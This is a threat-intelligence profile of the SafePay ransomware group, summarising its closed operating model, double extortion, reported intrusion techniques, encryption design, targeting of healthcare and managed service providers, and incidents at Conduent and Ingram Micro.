SafePay

SafePay is a ransomware operation that emerged in late 2024, first observed around September-October 2024. Multiple sources in the content describe it as a private, centralized, closed operation rather than a ransomware-as-a-service program; the group itself states on its leak site that it has never provided RaaS. SafePay uses double extortion, stealing data before encrypting systems and pressuring victims through a Tor-based leak site, with reporting noting that listed victims are generally those that did not pay. It has been described as one of the most active ransomware groups in 2025 and early 2026, with hundreds of claimed victims, including reporting of more than 260 and later more than 450 victims on its leak site.

Behaviorally, SafePay attacks are described as fast-moving, often progressing from initial access to encryption within 24 hours. Reported initial access vectors include compromised credentials on VPN gateways and RDP servers, and misconfigured FortiGate firewalls lacking MFA. Persistence and remote access have involved QDoor and ScreenConnect. Discovery and lateral movement have used ShareFinder.ps1, PsExec, WinRM, administrative utilities, and LOLBins. Defense evasion and impact behaviors include terminating antivirus, database, and backup processes, deleting Volume Shadow Copies, and modifying boot configuration to inhibit recovery. The ransomware is described as a Windows PE32 DLL that requires specific command-line arguments including a mandatory 32-byte password. Encryption reportedly uses AES or ChaCha20 for file encryption with keys protected by RSA or x25519, employs intermittent/block encryption for speed, appends the .safepay extension, and appends metadata containing an encrypted key and validation hash. Data theft has been conducted with WinRAR, FileZilla, Rclone, and 7-Zip. A kill switch prevents execution on systems with Cyrillic keyboard layouts, including Russian, Ukrainian, or Belarusian layouts.

SafePay has targeted organizations across multiple countries including Australia, the United States, the United Kingdom, Italy, New Zealand, Canada, Belgium, Brazil, Germany, Barbados, and Argentina. The content specifically highlights targeting of managed service providers and small-to-midsize businesses, and repeated activity against healthcare. Healthcare-focused reporting identifies SafePay among the most prolific ransomware strains targeting healthcare providers in 2025, and Health-ISAC describes SAFEPAY as focused on financial disruption, targeting healthcare billing and revenue-cycle systems and threatening exposure of billing records and patient financial data.

Victims and incidents directly mentioned in the content include Conduent, Ingram Micro, Favelle Favco, Genealogy SA, and Smile Team Orthodontics. In the Conduent intrusion from January 2025, SafePay claimed to have stolen more than 8 TB of data; Conduent confirmed that data from over 25 million individuals was stolen, including names, Social Security numbers, and medical or health insurance information, and the incident caused government service outages. In the July 2025 Ingram Micro incident, SafePay was reported as the responsible group, later claimed the attack on its leak site, and alleged theft of 3.5 TB of documents; Ingram Micro disclosed that more than 42,000 individuals were affected and that stolen files included employment and applicant records with names, contact information, dates of birth, Social Security numbers, driver’s license numbers, passport numbers, and employment-related evaluations. SafePay also listed Favelle Favco and Genealogy SA on its leak site and published data it claimed to have stolen from them, including business, financial, insurance, correspondence, technical, maintenance, and identity-document data.

Across the reporting in the content, SafePay is consistently characterized as a significant ransomware threat with strong operational security, centralized control of infrastructure and negotiations, and sustained activity through 2025 into 2026.